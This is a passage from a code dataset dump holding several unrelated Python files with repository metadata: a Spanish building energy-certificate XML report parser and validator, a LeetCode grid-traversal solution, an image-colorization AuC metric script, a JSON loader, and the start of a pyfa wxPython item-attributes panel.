'./IdentificacionEdificio/%s' % attr))\n if 'ninguno' in bb.ReferenciaCatastral:\n bb.ReferenciaCatastral = 
'-'\n if 'Seleccione de la lista' in bb.NormativaVigente:\n bb.NormativaVigente = '-' \n #print bb\n\n ## Datos generales y geometría\n bb = Bunch()\n data.DatosGeneralesyGeometria = bb\n bb.NumeroDePlantasSobreRasante = astext(et, './DatosGeneralesyGeometria/NumeroDePlantasSobreRasante')\n img = self.xmltree.find('./DatosGeneralesyGeometria/Imagen')\n bb.Imagen = base64check(img.text) if (img is not None and img.text) else None\n img = self.xmltree.find('./DatosGeneralesyGeometria/Plano')\n bb.Plano = base64check(img.text) if (img is not None and img.text) else None\n for attr in ['NumeroDePlantasBajoRasante',\n 'PorcentajeSuperficieHabitableCalefactada',\n 'PorcentajeSuperficieHabitableRefrigerada']:\n setattr(bb, attr, asint(et, './DatosGeneralesyGeometria/%s' % attr))\n for attr in ['SuperficieHabitable',\n 'VolumenEspacioHabitable',\n 'Compacidad',\n 'PorcentajeSuperficieAcristalada',\n 'DensidadFuentesInternas',\n 'VentilacionUsoResidencial',\n 'VentilacionTotal',\n 'DemandaDiariaACS']:\n setattr(bb, attr, asfloat(et, './DatosGeneralesyGeometria/%s' % attr))\n bb.PorcentajeSuperficieAcristalada = Bunch(\n **{key:asint(et, './DatosGeneralesyGeometria/PorcentajeSuperficieAcristalada/%s' % key)\n for key in 'N NE E SE S SO O NO'.split()})\n #print bb\n\n ## Datos Envolvente Térmica\n bb = Bunch()\n data.DatosEnvolventeTermica = bb\n bb.CerramientosOpacos = []\n elementosopacos = self.xmltree.find('./DatosEnvolventeTermica/CerramientosOpacos')\n elementosopacos = [] if elementosopacos is None else elementosopacos\n for elemento in elementosopacos:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'Orientacion', 'ModoDeObtencion']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['Superficie', 'Transmitancia']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n obj.Capas = []\n for ecapa in elemento.find('./Capas'):\n capa = Bunch()\n capa.Material = astext(ecapa, './Material')\n for attr in ['Espesor',\n 'ConductividadTermica', 'ResistenciaTermica',\n 'Densidad', 'FactorResistenciaVapor',\n 'CalorEspecifico']:\n setattr(capa, attr, asfloat(ecapa, './%s' % attr))\n obj.Capas.append(capa)\n bb.CerramientosOpacos.append(obj)\n\n bb.HuecosyLucernarios = []\n elementoshuecos = self.xmltree.find('./DatosEnvolventeTermica/HuecosyLucernarios')\n elementoshuecos = [] if elementoshuecos is None else elementoshuecos\n for elemento in elementoshuecos:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'Orientacion',\n 'ModoDeObtencionTransmitancia',\n 'ModoDeObtencionFactorSolar']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['Superficie', 'Transmitancia', 'FactorSolar']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.HuecosyLucernarios.append(obj)\n\n bb.PuentesTermicos = []\n elementospts = self.xmltree.find('./DatosEnvolventeTermica/PuentesTermicos')\n elementospts = [] if elementospts is None else elementospts\n for elemento in elementospts:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'ModoDeObtencion']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['Longitud', 'Transmitancia']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.PuentesTermicos.append(obj)\n #print bb\n\n ## Instalaciones Térmicas\n bb = Bunch()\n data.InstalacionesTermicas = bb\n bb.GeneradoresDeCalefaccion = []\n elementosgeneradores = self.xmltree.find('./InstalacionesTermicas/GeneradoresDeCalefaccion')\n elementosgeneradores = [] if elementosgeneradores is None else elementosgeneradores\n for elemento in elementosgeneradores:\n 
obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'VectorEnergetico',\n 'ModoDeObtencion']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['PotenciaNominal', 'RendimientoNominal', 'RendimientoEstacional']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.GeneradoresDeCalefaccion.append(obj)\n bb.totalpotenciageneradoresdecalefaccion = sum(e.PotenciaNominal for e in bb.GeneradoresDeCalefaccion if e.PotenciaNominal <= ALERT)\n \n bb.GeneradoresDeRefrigeracion = []\n elementosgeneradores = self.xmltree.find('./InstalacionesTermicas/GeneradoresDeRefrigeracion')\n elementosgeneradores = [] if elementosgeneradores is None else elementosgeneradores\n for elemento in elementosgeneradores:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'VectorEnergetico',\n 'ModoDeObtencion']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['PotenciaNominal', 'RendimientoNominal', 'RendimientoEstacional']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.GeneradoresDeRefrigeracion.append(obj)\n bb.totalpotenciageneradoresderefrigeracion = sum(e.PotenciaNominal for e in bb.GeneradoresDeRefrigeracion if e.PotenciaNominal <= ALERT)\n \n bb.InstalacionesACS = []\n elementosgeneradores = self.xmltree.find('./InstalacionesTermicas/InstalacionesACS')\n elementosgeneradores = [] if elementosgeneradores is None else elementosgeneradores\n for elemento in elementosgeneradores:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'VectorEnergetico',\n 'ModoDeObtencion']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['PotenciaNominal', 'RendimientoNominal', 'RendimientoEstacional']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.InstalacionesACS.append(obj)\n\n bb.SistemasSecundariosCalefaccionRefrigeracion = []\n elementossecundarios = self.xmltree.find('./InstalacionesTermicas/SistemasSecundariosCalefaccionRefrigeracion')\n elementossecundarios = [] if elementossecundarios is None else elementossecundarios\n for elemento in elementossecundarios:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'ZonaAsociada',\n 'EnfriamientoEvaporativo', 'RecuperacionEnergia',\n 'EnfriamentoGratuito', 'TipoControl']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['PotenciaCalor', 'PotenciaFrio', 'RendimentoCalor', 'RendimientoFrio',\n 'RendimientoEstacionalCalor', 'RendimientoEstacionalFrio']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.SistemasSecundariosCalefaccionRefrigeracion.append(obj)\n\n bb.TorresyRefrigeracion = []\n elementostorres = self.xmltree.find('./InstalacionesTermicas/TorresyRefrigeracion')\n elementostorres = [] if elementostorres is None else elementostorres\n for elemento in elementostorres:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'ServicioAsociado']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['ConsumoDeEnergia']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.TorresyRefrigeracion.append(obj)\n bb.totalconsumotorresyrefrigeracion = sum(e.ConsumoDeEnergia for e in bb.TorresyRefrigeracion)\n \n bb.VentilacionyBombeo = []\n elementosventila = self.xmltree.find('./InstalacionesTermicas/VentilacionyBombeo')\n elementosventila = [] if elementosventila is None else elementosventila\n for elemento in elementosventila:\n obj = Bunch()\n for attr in ['Nombre', 'Tipo', 'ServicioAsociado']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['ConsumoDeEnergia']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n 
bb.VentilacionyBombeo.append(obj)\n bb.totalconsumoventilacionybombeo = sum(e.ConsumoDeEnergia for e in bb.VentilacionyBombeo)\n #print bb\n\n ## Condiciones de funcionamiento y ocupación\n bb = []\n data.CondicionesFuncionamientoyOcupacion = bb\n elementoscond = self.xmltree.find('./CondicionesFuncionamientoyOcupacion')\n elementoscond = [] if elementoscond is None else elementoscond\n for elemento in elementoscond:\n obj = Bunch()\n for attr in ['Nombre', 'NivelDeAcondicionamiento', 'PerfilDeUso']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['Superficie']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.append(obj)\n #print self.CondicionesFuncionamientoyOcupacion\n\n # Superficies de los espacios\n data.superficies = dict((e.Nombre, e.Superficie) for e in data.CondicionesFuncionamientoyOcupacion)\n\n ## Instalaciones de iluminación\n bb = Bunch()\n data.InstalacionesIluminacion = bb\n bb.PotenciaTotalInstalada = asfloat(self.xmltree, './InstalacionesIluminacion/PotenciaTotalInstalada')\n bb.Espacios = []\n elementosilumina = self.xmltree.find('./InstalacionesIluminacion')\n elementosilumina = [] if elementosilumina is None else elementosilumina\n for elemento in elementosilumina:\n if elemento.tag == 'PotenciaTotalInstalada': continue\n obj = Bunch()\n for attr in ['Nombre', 'ModoDeObtencion']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['PotenciaInstalada', 'VEEI', 'IluminanciaMedia']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.Espacios.append(obj)\n _eiluminados = dict((e.Nombre, e) for e in bb.Espacios)\n _supiluminada = sum(data.superficies[e] for e in _eiluminados)\n bb.totalpotenciamedia = sum(1.0*data.superficies[e]*_eiluminados[e].PotenciaInstalada / _supiluminada for e in _eiluminados)\n #print bb\n\n ## Energías renovables\n bb = Bunch()\n data.EnergiasRenovables = bb\n bb.Termica = []\n elementosertermica = self.xmltree.find('./EnergiasRenovables/Termica')\n elementosertermica = [] if elementosertermica is None else elementosertermica\n for elemento in elementosertermica:\n obj = Bunch()\n for attr in ['Nombre']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['ConsumoFinalCalefaccion', 'ConsumoFinalRefrigeracion',\n 'ConsumoFinalACS', 'DemandaACS']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.Termica.append(obj)\n\n bb.totaltermica = Bunch()\n _noneaszero = lambda x: x if x is not None else 0\n bb.totaltermica.ConsumoFinalCalefaccion = sum(_noneaszero(getattr(e, 'ConsumoFinalCalefaccion', 0)) for e in bb.Termica)\n bb.totaltermica.ConsumoFinalRefrigeracion = sum(_noneaszero(getattr(e, 'ConsumoFinalRefrigeracion', 0)) for e in bb.Termica)\n bb.totaltermica.ConsumoFinalACS = sum(_noneaszero(getattr(e, 'ConsumoFinalACS', 0)) for e in bb.Termica)\n bb.totaltermica.DemandaACS = sum(_noneaszero(getattr(e, 'DemandaACS', 0)) for e in bb.Termica)\n\n bb.Electrica = []\n elementoserelectrica = self.xmltree.find('./EnergiasRenovables/Electrica')\n elementoserelectrica = [] if elementoserelectrica is None else elementoserelectrica\n for elemento in elementoserelectrica:\n obj = Bunch()\n for attr in ['Nombre']:\n setattr(obj, attr, astext(elemento, './%s' % attr))\n for attr in ['EnergiaGeneradaAutoconsumida']:\n setattr(obj, attr, asfloat(elemento, './%s' % attr))\n bb.Electrica.append(obj)\n bb.totalelectrica = sum(e.EnergiaGeneradaAutoconsumida for e in bb.Electrica)\n #print bb\n\n ## Demanda\n bb = Bunch()\n data.Demanda = bb\n bb.EdificioObjeto = Bunch()\n for attr 
in ['Global', 'Calefaccion', 'Refrigeracion', 'ACS',\n 'Conjunta', 'Calefaccion08', 'Refrigeracion08',\n 'Conjunta08', 'Ahorro08']:\n setattr(bb.EdificioObjeto, attr,\n asfloat(self.xmltree, './Demanda/EdificioObjeto/%s' % attr))\n\n bb.EdificioDeReferencia = Bunch()\n for attr in ['Global', 'Calefaccion', 'Refrigeracion', 'ACS',\n 'Conjunta', 'Calefaccion08', 'Refrigeracion08',\n 'Conjunta08']:\n setattr(bb.EdificioDeReferencia, attr,\n asfloat(self.xmltree, './Demanda/EdificioDeReferencia/%s' % attr))\n\n bb.Exigencias = Bunch()\n for attr in ['LimiteCalefaccionVivienda', 'LimiteRefrigeracionVivienda',\n 'LimiteAhorroOtrosUsos']:\n setattr(bb.Exigencias, attr,\n asfloat(self.xmltree, './Demanda/Exigencias/%s' % attr))\n #print bb\n\n ## Consumo\n bb = Bunch()\n data.Consumo = bb\n bb.FactoresdePaso = Bunch()\n\n cc = Bunch()\n for attr in VECTORES:\n setattr(cc, attr, asfloat(self.xmltree, './Consumo/FactoresdePaso/FinalAPrimariaNoRenovable/%s' % attr))\n bb.FactoresdePaso.FinalAPrimariaNoRenovable = cc\n\n cc = Bunch()\n for attr in VECTORES:\n setattr(cc, attr, asfloat(self.xmltree, './Consumo/FactoresdePaso/FinalAEmisiones/%s' % attr))\n bb.FactoresdePaso.FinalAEmisiones = cc\n\n cc = Bunch()\n for vec in VECTORES:\n vv = Bunch()\n if self.xmltree.find('./Consumo/EnergiaFinalVectores/%s' % vec) is not None:\n for servicio in SERVICIOS:\n setattr(vv, servicio, asfloat(self.xmltree, './Consumo/EnergiaFinalVectores/%s/%s' % (vec, servicio)))\n setattr(cc, vec, vv)\n bb.EnergiaFinalVectores = cc\n\n # Datos de energía final por servicios\n cc = Bunch()\n bb.EnergiaFinal = cc\n for vector in VECTORES:\n vecdata = getattr(bb.EnergiaFinalVectores, vector, None)\n if vecdata is None: continue\n for servicio in SERVICIOS:\n veccval = getattr(vecdata, servicio, 0.0)\n if veccval is None: continue\n cval = getattr(cc, servicio, 0.0)\n cval = 0.0 if cval is None else cval\n setattr(cc, servicio, cval + veccval)\n\n cc = Bunch()\n for servicio in SERVICIOS:\n setattr(cc, servicio, asfloat(self.xmltree, './Consumo/EnergiaPrimariaNoRenovable/%s' % servicio))\n bb.EnergiaPrimariaNoRenovable = cc\n\n bb.Exigencias = Bunch()\n bb.Exigencias.LimiteViviendaGlobalEPNR = asfloat(self.xmltree, './Consumo/Exigencias/LimiteViviendaGlobalEPNR')\n #print bb\n\n ## Emisiones de CO2\n bb = Bunch()\n data.EmisionesCO2 = bb\n for servicio in SERVICIOS + 'ConsumoElectrico ConsumoOtros TotalConsumoElectrico TotalConsumoOtros'.split():\n setattr(bb, servicio, asfloat(self.xmltree, './EmisionesCO2/%s' % servicio))\n #print bb\n\n ## Calificacion\n bb = Bunch()\n data.Calificacion = bb\n\n cc = Bunch()\n bb.Demanda = cc\n escala = self.xmltree.find('./Calificacion/Demanda/EscalaCalefaccion')\n if escala is not None:\n dd = Bunch()\n for nivel in NIVELESESCALA:\n setattr(dd, nivel, asfloat(escala, './%s' % nivel))\n cc.EscalaCalefaccion = dd\n escala = self.xmltree.find('./Calificacion/Demanda/EscalaRefrigeracion')\n if escala is not None:\n dd = Bunch()\n for nivel in NIVELESESCALA:\n setattr(dd, nivel, asfloat(escala, './%s' % nivel))\n cc.EscalaRefrigeracion = dd\n cc.Calefaccion = astext(self.xmltree, './Calificacion/Demanda/Calefaccion')\n cc.Refrigeracion = astext(self.xmltree, './Calificacion/Demanda/Refrigeracion')\n\n cc = Bunch()\n bb.EnergiaPrimariaNoRenovable = cc\n escala = self.xmltree.find('./Calificacion/EnergiaPrimariaNoRenovable/EscalaGlobal')\n if escala is not None:\n dd = Bunch()\n for nivel in NIVELESESCALA:\n setattr(dd, nivel, asfloat(escala, './%s' % nivel))\n cc.EscalaGlobal = dd\n cc.Global = 
astext(self.xmltree, './Calificacion/EnergiaPrimariaNoRenovable/Global')\n cc.Calefaccion = astext(self.xmltree, './Calificacion/EnergiaPrimariaNoRenovable/Calefaccion')\n cc.Refrigeracion = astext(self.xmltree, './Calificacion/EnergiaPrimariaNoRenovable/Refrigeracion')\n cc.ACS = astext(self.xmltree, './Calificacion/EnergiaPrimariaNoRenovable/ACS')\n cc.Iluminacion = astext(self.xmltree, './Calificacion/EnergiaPrimariaNoRenovable/Iluminacion')\n\n cc = Bunch()\n bb.EmisionesCO2 = cc\n escala = self.xmltree.find('./Calificacion/EmisionesCO2/EscalaGlobal')\n if escala is not None:\n dd = Bunch()\n for nivel in NIVELESESCALA:\n setattr(dd, nivel, asfloat(escala, './%s' % nivel))\n cc.EscalaGlobal = dd\n cc.Global = astext(self.xmltree, './Calificacion/EmisionesCO2/Global')\n cc.Calefaccion = astext(self.xmltree, './Calificacion/EmisionesCO2/Calefaccion')\n cc.Refrigeracion = astext(self.xmltree, './Calificacion/EmisionesCO2/Refrigeracion')\n cc.ACS = astext(self.xmltree, './Calificacion/EmisionesCO2/ACS')\n cc.Iluminacion = astext(self.xmltree, './Calificacion/EmisionesCO2/Iluminacion')\n #print bb\n\n ## Medidas de mejora\n data.MedidasDeMejora = []\n medidas = self.xmltree.find('./MedidasDeMejora')\n medidas = [] if medidas is None else medidas\n for medida in medidas:\n bb = Bunch()\n for attr in 'Nombre Descripcion CosteEstimado OtrosDatos'.split():\n txt = astext(medida, './%s' % attr)\n if txt and txt.startswith('data:/text/html,'):\n txt = txt.lstrip('data:/text/html,')\n txt = clean_html(txt)\n setattr(bb, attr, txt)\n cc = Bunch()\n bb.Demanda = cc\n for attr in 'Global GlobalDiferenciaSituacionInicial Calefaccion Refrigeracion'.split():\n setattr(cc, attr, asfloat(medida, './Demanda/%s' % attr))\n cc = Bunch()\n bb.CalificacionDemanda = cc\n for attr in 'Calefaccion Refrigeracion'.split():\n setattr(cc, attr, astext(medida, './CalificacionDemanda/%s' % attr))\n cc = Bunch()\n bb.EnergiaFinal = cc\n for attr in SERVICIOS:\n setattr(cc, attr, asfloat(medida, './EnergiaFinal/%s' % attr))\n cc = Bunch()\n bb.EnergiaPrimariaNoRenovable = cc\n for attr in SERVICIOS:\n setattr(cc, attr, asfloat(medida, './EnergiaPrimariaNoRenovable/%s' % attr))\n cc.GlobalDiferenciaSituacionInicial = asfloat(medida, './EnergiaPrimariaNoRenovable/GlobalDiferenciaSituacionInicial')\n cc = Bunch()\n bb.CalificacionEnergiaPrimariaNoRenovable = cc\n for attr in SERVICIOS:\n setattr(cc, attr, astext(medida, './CalificacionEnergiaPrimariaNoRenovable/%s' % attr))\n cc = Bunch()\n bb.EmisionesCO2 = cc\n for attr in SERVICIOS:\n setattr(cc, attr, asfloat(medida, './EmisionesCO2/%s' % attr))\n cc.GlobalDiferenciaSituacionInicial = asfloat(medida, './EmisionesCO2/GlobalDiferenciaSituacionInicial')\n cc = Bunch()\n bb.CalificacionEmisionesCO2 = cc\n for attr in SERVICIOS:\n setattr(cc, attr, astext(medida, './CalificacionEmisionesCO2/%s' % attr))\n data.MedidasDeMejora.append(bb)\n #print bb\n\n ## Pruebas, comprobaciones e inspecciones\n data.PruebasComprobacionesInspecciones = []\n pruebas = self.xmltree.find('./PruebasComprobacionesInspecciones')\n pruebas = [] if pruebas is None else pruebas\n for prueba in pruebas:\n bb = Bunch()\n bb.FechaVisita = astext(prueba, './FechaVisita')\n txt = astext(prueba, './Datos')\n if txt and txt.startswith('data:/text/html,'):\n txt = txt.lstrip('data:/text/html,')\n txt = clean_html(txt)\n bb.Datos = txt\n data.PruebasComprobacionesInspecciones.append(bb)\n #print bb\n\n ## Datos personalizados\n txt = astext(self.xmltree, './DatosPersonalizados')\n if txt and 
txt.startswith('data:/text/html,'):\n txt = txt.lstrip('data:/text/html,')\n txt = clean_html(txt)\n data.DatosPersonalizados = txt\n #print data.DatosPersonalizados\n\n return data\n\n def validate(self):\n \"\"\"Valida el informe XML según el esquema XSD\"\"\"\n # http://lxml.de/validation.html\n if self.version == '1':\n self.xmlschema = lxml.etree.XMLSchema(lxml.etree.parse(open(XSDPATH1)))\n else:\n self.xmlschema = lxml.etree.XMLSchema(lxml.etree.parse(open(XSDPATH2)))\n self.xmlschema.validate(self.xmltree)\n errors = [(error.line, error.message.encode(\"utf-8\"))\n for error in self.xmlschema.error_log]\n return errors\n\ndef analize(informe):\n \"\"\"Analiza contenidos de un Informe XML en busca de posibles errores\"\"\"\n dd = informe.data\n ddid = dd.IdentificacionEdificio\n ddgeo = dd.DatosGeneralesyGeometria\n zci = ddid.ZonaClimatica[:-1]\n zcv = ddid.ZonaClimatica[-1]\n esvivienda = 'Vivienda' in ddid.TipoDeEdificio\n\n info = []\n if ddid.AnoConstruccion == '-':\n info.append(('AVISO', u'No se ha definido el año de construcción'))\n if ddid.ReferenciaCatastral == '-':\n info.append(('AVISO', u'No se ha definido la referencia catastral'))\n\n if sum(dd.superficies.values()) > ddgeo.SuperficieHabitable:\n info.append(('ERROR', u'Superficies habitable menor que suma de la superficie de los espacios'))\n if zcv not in '1234':\n info.append(('ERROR', u'Zona climática de verano incorrecta'))\n if zci not in ['A', 'B', 'C', 'D', 'E', 'alfa', 'alpha']:\n info.append(('ERROR', u'Zona climática de invierno incorrecta'))\n\n plano_ = ddgeo.Plano\n if not plano_:\n info.append(('AVISO', u'Sin datos de plano'))\n elif not base64check(plano_):\n info.append(('AVISO', u'Datos de plano incorrectos'))\n\n imagen_ = ddgeo.Imagen\n if not imagen_:\n info.append(('AVISO', u'Sin datos de imagen'))\n elif not base64check(imagen_):\n info.append(('AVISO', u'Datos de imagen incorrectos'))\n\n if ((0 > ddgeo.PorcentajeSuperficieHabitableCalefactada > 100)\n or (0 > ddgeo.PorcentajeSuperficieHabitableRefrigerada > 100)):\n info.append(('ERROR', u'Porcentajes de superficies acondicionadas fuera de rango'))\n\n if esvivienda:\n # Sin chequear\n if (zcv == '1'\n and (dd.Demanda.EdificioDeReferencia.Refrigeracion\n or dd.Calificacion.EmisionesCO2.Refrigeracion\n or dd.Calificacion.Demanda.Refrigeracion\n or dd.Calificacion.EnergiaPrimariaNoRenovable.Refrigeracion)):\n info.append(('ERROR', u'Zona sin demanda de refrigeración de referencia y para el que se ha definido calificación para ese servicio'))\n # Sin chequear\n if (zci in ('alpha', 'alfa', 'a')\n and (dd.Demanda.EdificioDeReferencia.Calefaccion\n or dd.Calificacion.EmisionesCO2.Calefaccion\n or dd.Calificacion.Demanda.Calefaccion\n or dd.Calificacion.EnergiaPrimariaNoRenovable.Calefaccion)):\n info.append(('ERROR', u'Zona sin demanda de calefacción de referencia y para la que se ha definido calificación para ese servicio'))\n\n if not esvivienda:\n if not informe.data.InstalacionesTermicas.SistemasSecundariosCalefaccionRefrigeracion:\n info.append(('AVISO', u'No se han definido sistemas secundarios de calefacción y/o refrigeración'))\n if not informe.data.InstalacionesTermicas.VentilacionyBombeo:\n info.append(('AVISO', u'No se han definido sistemas de ventilación y bombeo'))\n\n def _visit(res, ckey, obj):\n \"Incluye en res la lista de valores numéricos con sus etiquetas\"\n if isinstance(obj, numbers.Number):\n res.append((obj, ckey))\n elif isinstance(obj, (list, tuple)):\n for item in obj:\n _visit(res, ckey, item)\n elif isinstance(obj, 
(Bunch,)):\n for key in obj.keys():\n if key.startswith('_'): continue\n _visit(res, key, obj[key])\n\n values = []\n _visit(values, 'root', informe.data)\n suspects = [key for (value, key) in values if value >= ALERT]\n if suspects:\n info.append(('AVISO', u'Valores numéricos erróneos en : %s' % ', '.join(set(suspects))))\n\n return info\n\n","repo_name":"pachi/visorxml_flask","sub_path":"visorxml/informes.py","file_name":"informes.py","file_ext":"py","file_size_in_byte":31364,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34076714778","text":"class Solution:\n def movingCount(self, m: int, n: int, k: int) -> int:\n def isValid(x: int, y: int):\n bit_sum = 0\n while x != 0:\n bit_sum += x % 10\n x = int(x / 10)\n while y != 0:\n bit_sum += y % 10\n y = int(y / 10)\n return bit_sum <= k\n\n def infect(x: int, y: int):\n # 回朔出口\n # 超出边界\n if x < 0 or x > m - 1 or y < 0 or y > n - 1: return 0\n # 超出k约定距离\n if not isValid(x, y) or (x, y) in footprint: return 0\n # 记录当前信息\n footprint.add((x, y))\n return infect(x + 1, y) + infect(x, y - 1) + infect(x - 1, y) + infect(x, y + 1) + 1\n footprint = set() # 我们在回朔的时候,不但要知道怎么走出去,还要记录足迹,为的是防止重复。\n\n return infect(0, 0)\n\n\nfoo = Solution()\nprint(foo.movingCount(2, 3, 1))\n","repo_name":"Allen-C-Guan/Leetcode-Answer","sub_path":"python_part/Leetcode/Traverse/backtracking and DFS/面试13/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3528203305","text":"import sys\nimport numpy as np\nimport skimage\n\nimport argparse\nimport os\n\n\nimport skimage.io as io\nimport skimage.color as color\n\n\ndef main(ref_dir, gen_dir):\n \"\"\"\n Compute the mean and standard deviation of the AuC metric from an image directory\n \n Args:\n ref_dir: reference images directory\n gen_dir: generated images directory\n \"\"\"\n MAX_THRESHOLD = 150\n\n files = os.listdir(ref_dir)\n\n auc_list = np.empty(len(files))\n\n for i, file in enumerate(files):\n if(os.path.exists(os.path.join(gen_dir,file))):\n \n # Load images\n img0 = io.imread(os.path.join(ref_dir,file))\n img1 = io.imread(os.path.join(gen_dir,file))\n \n n_pixels = img0.shape[0]*img1.shape[1]\n \n # Convert the image to the AB color space\n img0_lab = color.rgb2lab(img0)\n img1_lab = color.rgb2lab(img1)\n img0_lab[:,:,0] = 0\n img1_lab[:,:,0] = 0\n \n dist = color.deltaE_cie76(img0_lab,img1_lab)\n \n auc = 0.0\n \n # Compute the cumulative mass function of the distance function over the 0-150 range\n for threshold in range(0,MAX_THRESHOLD):\n pix_under_curve = len(dist[dist<=threshold])\n auc += pix_under_curve/n_pixels\n auc /= MAX_THRESHOLD\n auc_list[i] = auc\n \n print('%s: %.4f'%(file,auc))\n \n print(\"Auc mean: {:.4f}\".format(auc_list.mean()))\n print(\"Auc std: {:.4f}\".format(auc_list.std()))\n \nif __name__=='__main__':\n\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-d0','--dir0', type=str, required=True, help='reference images directory')\n parser.add_argument('-d1','--dir1', type=str, required=True, help='generated images directory')\n \n opt = parser.parse_args()\n main(opt.dir0, opt.dir1)","repo_name":"majedelhelou/BIGPrior","sub_path":"code/auc.py","file_name":"auc.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} 
+{"seq_id":"28995041247","text":"#!/usr/bin/python3\n'''\nWrite a function that creates an\nObject from a “JSON file”\n'''\n\nimport json\n\n\ndef load_from_json_file(filename):\n '''\n Create object from JSON file\n '''\n if filename is None:\n return\n with open(filename, 'r', encoding='utf-8') as f:\n json_var = json.load(f)\n return json_var\n","repo_name":"Gzoref/holbertonschool-higher_level_programming","sub_path":"0x0B-python-input_output/8-load_from_json_file.py","file_name":"8-load_from_json_file.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"28120836800","text":"import sys\r\nimport csv\r\nimport config\r\n\r\n# noinspection PyPackageRequirements\r\nimport wx\r\n\r\nfrom helpers import AutoListCtrl\r\n\r\nfrom gui.bitmapLoader import BitmapLoader\r\nfrom service.market import Market\r\nfrom service.attribute import Attribute\r\nfrom gui.utils.numberFormatter import formatAmount\r\n\r\n\r\nclass ItemParams(wx.Panel):\r\n def __init__(self, parent, stuff, item, context=None):\r\n wx.Panel.__init__(self, parent)\r\n mainSizer = wx.BoxSizer(wx.VERTICAL)\r\n\r\n self.paramList = AutoListCtrl(self, wx.ID_ANY,\r\n style=wx.LC_REPORT | wx.LC_SINGLE_SEL | wx.LC_VRULES | wx.NO_BORDER)\r\n mainSizer.Add(self.paramList, 1, wx.ALL | wx.EXPAND, 0)\r\n self.SetSizer(mainSizer)\r\n\r\n self.toggleView = 1\r\n self.stuff = stuff\r\n self.item = item\r\n self.attrInfo = {}\r\n self.attrValues = {}\r\n self._fetchValues()\r\n\r\n self.m_staticline = wx.StaticLine(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_HORIZONTAL)\r\n mainSizer.Add(self.m_staticline, 0, wx.EXPAND)\r\n bSizer = wx.BoxSizer(wx.HORIZONTAL)\r\n\r\n self.totalAttrsLabel = wx.StaticText(self, wx.ID_ANY, u\" \", wx.DefaultPosition, wx.DefaultSize, 0)\r\n bSizer.Add(self.totalAttrsLabel, 0, wx.ALIGN_CENTER_VERTICAL | wx.RIGHT)\r\n\r\n self.toggleViewBtn = wx.ToggleButton(self, wx.ID_ANY, u\"Toggle view mode\", wx.DefaultPosition, wx.DefaultSize,\r\n 0)\r\n bSizer.Add(self.toggleViewBtn, 0, wx.ALIGN_CENTER_VERTICAL)\r\n\r\n self.exportStatsBtn = wx.ToggleButton(self, wx.ID_ANY, u\"Export Item Stats\", wx.DefaultPosition, wx.DefaultSize,\r\n 0)\r\n bSizer.Add(self.exportStatsBtn, 0, wx.ALIGN_CENTER_VERTICAL)\r\n\r\n if stuff is not None:\r\n self.refreshBtn = wx.Button(self, wx.ID_ANY, u\"Refresh\", wx.DefaultPosition, wx.DefaultSize, wx.BU_EXACTFIT)\r\n bSizer.Add(self.refreshBtn, 0, wx.ALIGN_CENTER_VERTICAL)\r\n self.refreshBtn.Bind(wx.EVT_BUTTON, self.RefreshValues)\r\n\r\n mainSizer.Add(bSizer, 0, wx.ALIGN_RIGHT)\r\n\r\n self.PopulateList()\r\n\r\n self.toggleViewBtn.Bind(wx.EVT_TOGGLEBUTTON, self.ToggleViewMode)\r\n self.exportStatsBtn.Bind(wx.EVT_TOGGLEBUTTON, self.ExportItemStats)\r\n\r\n def _fetchValues(self):\r\n if self.stuff is None:\r\n self.attrInfo.clear()\r\n self.attrValues.clear()\r\n self.attrInfo.update(self.item.attributes)\r\n self.attrValues.update(self.item.attributes)\r\n elif self.stuff.item == self.item:\r\n self.attrInfo.clear()\r\n self.attrValues.clear()\r\n self.attrInfo.update(self.stuff.item.attributes)\r\n self.attrValues.update(self.stuff.itemModifiedAttributes)\r\n elif self.stuff.charge == self.item:\r\n self.attrInfo.clear()\r\n self.attrValues.clear()\r\n self.attrInfo.update(self.stuff.charge.attributes)\r\n 